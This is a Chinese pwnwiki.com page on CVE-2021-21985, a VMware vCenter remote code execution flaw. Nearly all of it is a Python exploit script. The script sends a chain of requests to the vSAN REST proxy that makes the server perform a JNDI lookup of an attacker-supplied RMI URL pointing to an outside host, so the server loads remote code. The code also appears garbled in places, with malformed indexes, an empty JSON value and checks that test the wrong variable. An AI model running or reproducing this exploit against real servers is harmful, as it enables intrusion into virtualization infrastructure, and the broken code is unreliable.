Loading
0

CVE-2021-21985 VMware vCenter 远程任意代码执行漏洞/zh-cn

免费、自由、人人可编辑的漏洞库--pwnwiki.com

,

截图

Twitter E3CB24AUUAEl1 8.jpg

EXP

import requests
import sys
import json
def send_request(host,uri,json):
    try:
        req = requests.post(url=host+baseuri+uri,json=json,headers=headers,verify=False)
        return req.text
    except:
        return False
def check_false(request):
    if request ==False or 'result' not in request:
        print("* No Vuln!")
        return True
if __name__ == '__main__':
    if len(sys.argv) < 2:
        print('''python3 cve-2021-21985.py https://host rmi://8.8.8.8:1099/Exploit''')
        sys.exit()
    host = sys.argv1
    payload = sys.argv2
    baseuri = "ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService"
    uris = "/setTargetObject", "/setStaticMethod", "/setTargetMethod", "/setArguments", "/prepare", "/invoke"
    headers = {'Content-Type': 'application/json', "User-Agent": "pentest"}
    stage_setTargetObject = json.loads('{"methodInput":null}')
    stage_setStaticMethod = json.loads('{"methodInput":"javax.naming.InitialContext.doLookup"}')
    stage_setTargetMethod = json.loads('{"methodInput":"doLookup"}')
    stage_setArguments = json.loads('{"methodInput":"%s"}'%payload)
    stage_prepare = json.loads('{"methodInput":}')
    print("* start init TargetObject")
    # init TargetObject
    init_request  = send_request(host,uris0,json=stage_setTargetObject)
    if check_false(init_request):
        print("* init failed!")
        exit()
    # Step2 setStaticMethod
    StaticMethod = send_request(host,uris1,json=stage_setStaticMethod)
    if check_false(init_request):
        print("* StaticMethod init failed!")
        exit()
    # Step3 setTargetMethod
    StaticMethod = send_request(host,uris2,json=stage_setTargetMethod)
    if check_false(init_request):
        print("* setTarget Method failed!")
        exit()
    # Step4 setArguments
    # print(stage_setArguments)
    setArguments = send_request(host,uris3,json=stage_setArguments)
    if check_false(init_request):
        print("* setArguments failstage_setArgumentsed!")
        exit()
    # Step5 prepare
    setArguments = send_request(host,uris4,json=stage_prepare)
    if check_false(init_request):
        print("* stage_prepare failed!")
        exit()
    # Step6 invoke
    setArguments = send_request(host,uris5,json=stage_prepare)
    if check_false(init_request):
        print("* invoke failed!")
        exit()

参考

https://github.com/xnianq/cve-2021-21985_exp/

https://twitter.com/_0xf4n9x_?s=21

免费、自由、人人可编辑的漏洞库--pwnwiki.com